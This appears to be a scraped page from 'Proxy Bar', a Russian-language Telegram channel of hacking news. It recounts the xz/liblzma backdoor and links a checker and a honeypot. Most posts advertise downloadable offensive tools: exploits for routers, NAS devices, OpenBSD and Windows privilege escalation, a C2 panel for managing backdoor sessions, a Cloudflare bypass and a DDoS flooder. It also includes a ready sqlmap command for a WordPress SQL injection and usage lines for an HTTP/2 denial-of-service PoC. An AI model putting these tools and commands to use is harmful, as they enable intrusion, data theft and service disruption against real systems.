Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Backdoor в xz/liblzma (атака на цепочку поставок)
part 3
Ну и кто добавил вредонос ?
*
А ноги растут из 2021 года, когда был создан акк JiaT75 на гите.
JiaT75 делает коммит, заменяя Safe_fprint небезопасным вариантом, делая еще одну потенциальную дырку.
*
В 2022 году добавляет патч к xz и появляется еще один коммитер Jigar Kumar.
Вместе они парят голову Лассе Колину (разраб xz) и патч мерджится.
Ребятам стали доверять и выдали креды к репозиторию.
*
В 2023 контактная почта в Google oss-fuzz меняется на JiaT75, а не на Лассе Коллина.
И коммиты понеслись....
*
В 2024 году ребята меняю URL tukaani.org/xz/ на xz.tukaani.org/xz-utils/ который далее уводит на гит JiaT75. Отжали проект. Далее добавляются последнии коммиты уже с бэкдором и шлюхами
🔥19😱4👍2
Backdoor в xz/liblzma (атака на цепочку поставок)
part 4
К врачу за мной будете.
Делать то что ? Ну во первых нужно проверить версию либы
xz -V

если версия liblzma 5.6.0 или liblzma 5.6.1 - начинайте как я жрать таблетки (в arch linux прилетело), откатываемся до безопасной версии liblzma 5.4.1
А вот в последнем обновлении debian таки хорошая версия, безопасная.
*
UPDATE
Вот чекер (чекает apt\yum\zipper) и если версия забэкдоренная, предлагает поставить нормальную стабильную
download checker
👍14🔥5😱2
xz-vulnerable-honeypot
*
SSH-ханипот с бэкдором XZ. CVE-2024-3094
*
download

#xz #docker #honeypot
🔥16👍3😱1👌1
С праздником 😝

#SOC #1april
👌14👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Cloudflare Bypass Script
*
download
👍25🔥12😱5👌1
xzbot (CVE-2024-3094)
*
Рассуждения
honeypot
+ Тестовый эксплоит для xz backdoor
*
Подобрать

#xz #backdoor
🔥20👍1😱1
This media is not supported in your browser
VIEW IN TELEGRAM
OpenBSD IPv6 Multicast Forwarding Cache sysctl kernel heap overflow
*
exploit

#openBSD #NFS
🔥11
Практическая скрытая беспроводная однонаправленная связь в среде IEEE 802.11
*
Хардварщики как всегда, нет им покоя, в целом молодцы ! Хорошо расписано !
*
ВОУ ВОУ почитать
*

#802.11 #тихоБудь
🔥19
This media is not supported in your browser
VIEW IN TELEGRAM
как реагирует SOC на фолс позитив )))
🔥69👌5👍3😱2
Jasmin ransomware web panel path traversal
*
Деанон операторов ransom панели Jasmin и сброс ключей дешифрования

exploit
👍20🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-30850
*
chaos-rat RCE
*
exploit
🔥11👌2😱1
C2 Cloud
веб-инфраструктура C2
*
Anywhere Access: Reach the C2 Cloud from any location.
Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
*
download

#CC
👍13🔥2👌1
Pentes LAB - SCCM (red team tactics)
*
Часть 0х0
Часть 0х1 - Recon and PXE
Часть 0х2 - Low user
Часть 0х3 - Admin User
*

#redteam #sccm
🔥9
CVE-2024-3273
*
D-Link NAS версии:

DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
DNS-325 Version 1.01
DNS-327L Version 1.09, Version 1.00.0409.2013
DNS-340L Version 1.08


Exploit + Tool

#dlink #exploit #NAS
🔥14
This media is not supported in your browser
VIEW IN TELEGRAM
Вся боль сетевиков и cisco 2960 😜
*
бегом ставить Packet Tracer Tracket Pacer

#CCNA #song #lol
🔥34😱2
CVE-2024-29269
*
Маршрутизаторы TELESQUARE TLR-2005KSH уязвимы для неаутентифицированных команд
*
Хантер показывает что есть 3307 девайсов
*
POC exploit
🔥17👍1
CVE-2024-27316 Атака на http/2
*
Подробности уязвимости
*
Конкретно CVE-2024-27316 влияет на другие CVE:
CVE-2024-30255 (untested)
CVE-2024-31309 (untested)
CVE-2024-28182 (untested)
CVE-2024-2653 (untested)
CVE-2024-27919 (untested)
*
Usage:
go build
./cve-2024-27316 -t 127.0.0.1:80 -p http -i 8192
./cve-2024-27316 -t 127.0.0.1:443 -p https -i 8192

*
POC exploit
🔥13
CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T


#wordpress
🔥20
CVE-2023-36047
*
Дырка в службе usermanager, которая копировала файлы из каталога, управляемого пользователем, что приводило к Elevation of Privilege.
ЗаБагФиксили только часть операции копирования, а операция чтения все еще выполняелась в контексте NT AUTHORITY\\SYSTEM. Эту уязвимость можно использовать для получения SAM /SYSTEM/SECURITY из теневой копии.
Патч уже есть и уязвимость отслеживается как CVE-2024-21447
*
Exploit

#windows #eop
👍10🔥1👌1
DDOS flooder 193.93.248.103
забавный такой 😜
👍13🔥4😱3👌3